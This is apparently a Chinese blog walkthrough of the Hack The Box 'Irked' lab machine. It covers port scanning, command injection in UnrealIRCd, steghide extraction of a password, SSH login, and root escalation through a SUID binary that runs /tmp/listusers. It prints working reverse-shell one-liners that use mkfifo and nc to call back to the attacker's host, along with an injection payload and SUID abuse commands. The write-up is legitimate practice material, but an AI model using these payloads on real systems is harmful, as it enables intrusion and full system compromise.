Hack The Box】linux练习"/>
【Hack The Box】linux练习
HTB 学习笔记
【Hack The Box】linux练习-- Irked
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
文章目录
- HTB 学习笔记
- 信息收集
- irc
- steg隐写术分析
- 提权思路
信息收集
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a5df5bdcf8378b675319bdc79c5fdad (DSA)
| 2048 752e66bfb93cccf77e848a8bf0810233 (RSA)
| 256 c8a3a25e349ac49b9053f750bfea253b (ECDSA)
|_ 256 8d1b43c7d01a4c05cf82edc10163a20c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33304/tcp6 status
| 100024 1 41603/udp6 status
| 100024 1 42358/tcp status
|_ 100024 1 60786/udp status
3172/tcp filtered serverview-rm
6463/tcp filtered unknown
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
这个页面让我觉得irc有问题,并且nmap给我们展示了irc名字UnrealIRCd
我在检查irc的同时开始对web页面进行目录爆破
结果是没有结果
如果你没有安装irc客户端可以如下这么安装
irc
apt update && apt install -y hexchat
而后hexchat打开
再首页面添加irked,而后再编辑它
发现并没有频道
我将搜索exp,发现如果我是3.2.8.1或者3.x我应该进行一些利用
但是我现在没有任何办法去获得版本信息
我将分析一下这几个基于linux的exp,看看他们是如何利用的
看到payload
尝试一下
nc 10.129.16.135 6697
AB; ping -c 1 10.10.14.7
本机监听icmp流量
tcpdump -ni tun0 icmp
发现成功
于是反弹端口
AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.7 443 >/tmp/f
我发现我看不到user.txt他是加密的
于是我ls -la,发现了一个.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
steg隐写术分析
steg用下面的这个工具
带着密码我们就可以提取图片内容
steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
extract- 我想提取数据
-sf irked.jpg- 提供要从中提取的文件
-p- 密码
得到了密码就登陆
ssh djmardov@10.129.16.135
查询可提权文件
find / -perm -4000 -type f 2>/dev/null
发现了一个从没见过的
我们直接执行看看他是干嘛的
提权思路
说tmp下有个文件没找到,这应该就很明了了,因为他需要tmp下的文件执行,而我们对tmp完全可控,所以我们把命令写到/tmp/listusers即可
/tmp/listusers: not found
echo “test” > /tmp/listusers
再执行viewuse发现listusers没有权限
所以我们给他权限,因为他在tmp
chmod +x /tmp/listusers
echo “id” > /tmp/listusers
再执行
viewuse
echo "cat /root/root.txt" > /tmp/listusers
我们获得了root.txt
反弹个端口就行
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.7 8888 >/tmp/f" > /tmp/listusers
viewuser
更多推荐
【Hack The Box】linux练习
发布评论